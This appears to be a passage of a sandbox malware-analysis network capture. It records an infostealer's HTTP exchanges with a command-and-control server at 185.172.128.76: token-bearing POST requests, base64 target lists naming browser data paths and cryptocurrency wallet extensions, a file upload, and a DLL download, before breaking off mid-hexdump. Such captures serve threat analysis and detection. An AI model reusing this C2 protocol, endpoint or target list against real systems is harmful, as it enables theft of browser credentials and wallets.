                                                                                                                                                                                                                            Data Raw: 4d 57 4d 79 4e 54 63 35 4d 6a 41 7a 4e 6d 55 34 4e 6a 68 68 4d 7a 67 7a 4e 32 46 69 4d 32 51 77 5a 54 55 34 4d 44 67 79 4f 44 51 79 59 54 67 33 4f 57 59 30 59 7a 59 78 59 54 59 7a 4f 57 4d 78 5a 57 4d 31 5a 6d 52 6d 4e 44 45 33 4f 47 5a 68 4e 6a 51 34 5a 47 59 33 4f 54 63 31 4e 44 6b 32 66 47 68 6c 63 6a 64 6f 4e 44 68 79 66 47 56 79 4e 47 67 30 5a 54 68 79 4e 43 35 6d 61 57 78 6c 66 44 46 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 3d
                                                                                                                                                                                                                            Data Ascii: MWMyNTc5MjAzNmU4NjhhMzgzN2FiM2QwZTU4MDgyODQyYTg3OWY0YzYxYTYzOWMxZWM1ZmRmNDE3OGZhNjQ4ZGY3OTc1NDk2fGhlcjdoNDhyfGVyNGg0ZThyNC5maWxlfDF8MHwxfDF8MXwxfDF8MXw=
                                                                                                                                                                                                                            Apr 25, 2024 09:04:01.975179911 CEST469OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----GDHIIDAFIDGCFHJJDGDA
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 268
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 49 44 41 46 49 44 47 43 46 48 4a 4a 44 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 32 35 37 39 32 30 33 36 65 38 36 38 61 33 38 33 37 61 62 33 64 30 65 35 38 30 38 32 38 34 32 61 38 37 39 66 34 63 36 31 61 36 33 39 63 31 65 63 35 66 64 66 34 31 37 38 66 61 36 34 38 64 66 37 39 37 35 34 39 36 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 49 44 41 46 49 44 47 43 46 48 4a 4a 44 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 49 44 41 46 49 44 47 43 46 48 4a 4a 44 47 44 41 2d 2d 0d 0a
                                                                                                                                                                                                                            Data Ascii: ------GDHIIDAFIDGCFHJJDGDAContent-Disposition: form-data; name="token"1c25792036e868a3837ab3d0e58082842a879f4c61a639c1ec5fdf4178fa648df7975496------GDHIIDAFIDGCFHJJDGDAContent-Disposition: form-data; name="message"browsers------GDHIIDAFIDGCFHJJDGDA--
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.298523903 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Thu, 25 Apr 2024 07:04:02 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 1520
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 64 6d 6c 32 59 57 78 6b 61 53 35 6c 65 47 56 38 51 32 39 74 62 32 52 76 49 45 52 79 59 57 64 76 62 6e 78 63 51 32 39 74 62 32 52 76 58 45 52 79 59 57 64 76 62 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 52 58 42 70 59 31 42 79 61 58 5a 68 59 33 6c 43 63 6d 39 33 63 32 56 79 66 46 78 46 63 47 6c 6a 49 46 42 79 61 58 5a 68 59 33 6b 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 32 39 6a 51 32 39 6a 66 46 78 44 62 32 4e 44 62 32 4e 63 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 6e 4a 68 64 6d 56 38 58 45 4a 79 59 58 5a 6c 55 32 39 6d 64 48 64 68 63 6d 56 63 51 6e 4a 68 64 6d 55 74 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4a 79 59 58 5a 6c 4c 6d 56 34 5a 58 78 44 5a 57 35 30 49 45 4a 79 62 33 64 7a 5a 58 4a 38 58 45 4e 6c 62 6e 52 43 63 6d 39 33 63 32 56 79 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 77 33 55 33 52 68 63 6e 78 63 4e 31 4e 30 59 58 4a 63 4e 31 4e 30 59 58 4a 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 77 66 45 4e 6f 5a 57 52 76 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 61 47 56 6b 62 33 52 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 77 66 45 31 70 59 33 4a 76 63 32 39 6d 64 43 42 46 5a 47 64 6c 66 46 78 4e 61 57 4e 79 62 33 4e 76 5a 6e 52 63 52 57 52 6e 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 31 7a 5a 57 52 6e 5a 53 35 6c 65 47 56 38 4d 7a 59 77 49 45 4a 79 62 33 64 7a 5a 58 4a 38 58 44 4d 32 4d 45 4a 79 62 33 64 7a 5a 58 4a 63 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 55 56 46 43 63 6d 39 33 63 32 56 79 66 46 78 55 5a 57 35 6a 5a 57 35 30 58 46 46 52 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62
                                                                                                                                                                                                                            Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.298546076 CEST427INData Raw: 32 31 6c 66 47 4a 79 62 33 64 7a 5a 58 49 75 5a 58 68 6c 66 45 39 77 5a 58 4a 68 49 46 4e 30 59 57 4a 73 5a 58 78 63 54 33 42 6c 63 6d 45 67 55 32 39 6d 64 48 64 68 63 6d 56 38 62 33 42 6c 63 6d 46 38 62 33 42 6c 63 6d 45 75 5a 58 68 6c 66 45 39
                                                                                                                                                                                                                            Data Ascii: 21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRmlyZWZveHxcTW96aWxsYVxGaXJlZm94XFByb2ZpbGVzfGZpcmVmb3h8MHxQYWxlIE1vb258XE1vb25jaGlsZCBQ
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.300152063 CEST468OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----GIJJKKJJDAAAAAKFHJJD
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 267
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 32 35 37 39 32 30 33 36 65 38 36 38 61 33 38 33 37 61 62 33 64 30 65 35 38 30 38 32 38 34 32 61 38 37 39 66 34 63 36 31 61 36 33 39 63 31 65 63 35 66 64 66 34 31 37 38 66 61 36 34 38 64 66 37 39 37 35 34 39 36 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 2d 2d 0d 0a
                                                                                                                                                                                                                            Data Ascii: ------GIJJKKJJDAAAAAKFHJJDContent-Disposition: form-data; name="token"1c25792036e868a3837ab3d0e58082842a879f4c61a639c1ec5fdf4178fa648df7975496------GIJJKKJJDAAAAAKFHJJDContent-Disposition: form-data; name="message"plugins------GIJJKKJJDAAAAAKFHJJD--
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.619925976 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Thu, 25 Apr 2024 07:04:02 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 5416
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d 5a 75 59 6d 56 73 5a 6d 52 76 5a 57 6c 76 61 47 56 75 61 32 70 70 59 6d 35 74 59 57 52 71 61 57 56 6f 61 6d 68 68 61 6d 4a 38 4d 58 77 77 66 44 42 38 51 32 39 70 62 6d 4a 68 63 32 55 67 56 32 46 73 62 47 56 30 49 47 56 34 64 47 56 75 63 32 6c 76 62 6e 78 6f 62 6d 5a 68 62 6d 74 75 62 32 4e 6d 5a 57 39 6d 59 6d 52 6b 5a 32 4e 70 61 6d 35 74 61 47 35 6d 62 6d 74 6b 62 6d 46 68 5a 48 77 78 66 44 42 38 4d 58 78 48 64 57 46 79 5a 47 46 38 61 48 42 6e 62 47 5a 6f 5a 32 5a 75 61 47 4a 6e 63 47 70 6b 5a 57 35 71 5a 32 31 6b 5a 32 39 6c 61 57 46 77 63 47 46 6d 62 47 35 38 4d 58 77 77 66 44 42 38 53 6d 46 34 65 43 42 4d 61 57 4a 6c 63 6e 52 35 66 47 4e 71 5a 57 78 6d 63 47 78 77 62 47 56 69 5a 47 70 71 5a 57 35 73 62 48 42 71 59 32 4a 73 62 57 70 72 5a 6d 4e 6d 5a 6d 35 6c 66 44 46 38 4d 48 77 77 66 47 6c 58 59 57 78 73 5a 58 52 38 61 32 35 6a 59 32 68 6b 61 57 64 76 59 6d 64 6f 5a 57 35 69 59 6d 46 6b 5a 47 39 71 61 6d 35 75 59 57 39 6e 5a 6e 42 77 5a 6d 70 38 4d 58 77 77 66 44 42 38 54 55 56 58 49 45 4e 59 66 47 35 73 59 6d 31 75 62 6d 6c 71 59 32 35 73 5a 57 64 72 61 6d 70 77 59 32 5a 71 59 32 78 74 59 32 5a 6e 5a 32 5a 6c 5a 6d 52 74 66 44 46 38 4d 48 77 77 66 45 64 31 61 57 78 6b 56 32 46 73 62 47 56 30 66 47 35 68 62 6d 70 74 5a 47 74 75 61 47 74 70 62 6d 6c 6d 62 6d 74 6e 5a 47 4e 6e 5a 32 4e 6d 62 6d 68 6b 59 57 46 74 62 57 31 71 66 44 46 38 4d 48 77 77 66 46 4a 76 62 6d 6c 75 49 46 64 68 62 47 78 6c 64 48 78 6d 62 6d 70 6f 62 57 74 6f 61 47 31 72 59 6d 70 72 61 32 46 69 62 6d 52 6a 62 6d 35 76 5a 32 46 6e 62 32 64 69 62 6d 56 6c 59 33 77 78 66 44 42 38 4d 48 78 4f 5a 57 39 4d 61 57 35 6c 66 47 4e 77 61 47 68 73 5a 32 31 6e 59 57 31 6c 62 32 52 75 61 47 74 71 5a 47 31 72 63 47 46 75 62 47 56 73 62 6d 78 76 61 47 46 76 66 44 46 38 4d 48 77 77 66 45 4e 4d 56 69 42 58 59 57 78 73 5a 58 52 38 62 6d 68 75 61 32 4a 72 5a 32 70 70 61 32 64 6a 61 57 64 68 5a 47 39 74 61 33 42 6f 59 57 78 68 62 6d 35 6b 59 32 46 77 61 6d 74 38 4d 58 77 77 66 44 42 38 54 47 6c 78 64 57 46 73 61 58 52 35 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 64 68 62
                                                                                                                                                                                                                            Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhb
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.619940996 CEST1289INData Raw: 47 78 6c 64 48 78 68 61 57 6c 6d 59 6d 35 69 5a 6d 39 69 63 47 31 6c 5a 57 74 70 63 47 68 6c 5a 57 6c 71 61 57 31 6b 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 78 6b 62 57 74 68 62 57 4e 72 62 6d 39 6e 61 32 64
                                                                                                                                                                                                                            Data Ascii: GxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBk
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.619951963 CEST1289INData Raw: 46 73 62 47 56 30 66 47 4a 6f 61 47 68 73 59 6d 56 77 5a 47 74 69 59 58 42 68 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46 64 68 62 47 78 6c 64 48 78 6b 61 32 52 6c
                                                                                                                                                                                                                            Data Ascii: FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8M
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.620038033 CEST1289INData Raw: 77 59 6d 64 6a 61 6d 56 77 62 6d 68 70 59 6d 78 68 61 57 4a 6a 62 6d 4e 73 5a 32 74 38 4d 58 77 77 66 44 42 38 52 6d 6c 75 62 6d 6c 6c 66 47 4e 71 62 57 74 75 5a 47 70 6f 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 5a 48 42 76 62 57 4e 6a 62
                                                                                                                                                                                                                            Data Ascii: wYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY2
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.620050907 CEST456INData Raw: 59 6d 56 72 59 32 4e 70 62 6d 68 68 63 47 52 69 66 44 46 38 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32 52 6e 59 33 42 69 63 47 5a 70 5a 32 4e 68 5a 57 70 77 5a 6d 68 6d 5a 57 64 6c 61 32 52 6e 61 57
                                                                                                                                                                                                                            Data Ascii: YmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHx
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.757330894 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----JDAFHCGIJECFHIDGDBKE
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Content-Length: 6183
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 25, 2024 09:04:02.757380009 CEST6183OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 44 41 46 48 43 47 49 4a 45 43 46 48 49 44 47 44 42 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 32 35 37 39
                                                                                                                                                                                                                            Data Ascii: ------JDAFHCGIJECFHIDGDBKEContent-Disposition: form-data; name="token"1c25792036e868a3837ab3d0e58082842a879f4c61a639c1ec5fdf4178fa648df7975496------JDAFHCGIJECFHIDGDBKEContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
                                                                                                                                                                                                                            Apr 25, 2024 09:04:03.104887009 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Thu, 25 Apr 2024 07:04:03 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Apr 25, 2024 09:04:03.514728069 CEST93OUTGET /15f649199f40275b/sqlite3.dll HTTP/1.1
                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                            Apr 25, 2024 09:04:03.831964016 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                            Date: Thu, 25 Apr 2024 07:04:03 GMT
                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                            Content-Length: 1106998
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
                                                                                                                                                                                                                            ETag: "10e436-5e7ec6832a180"
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 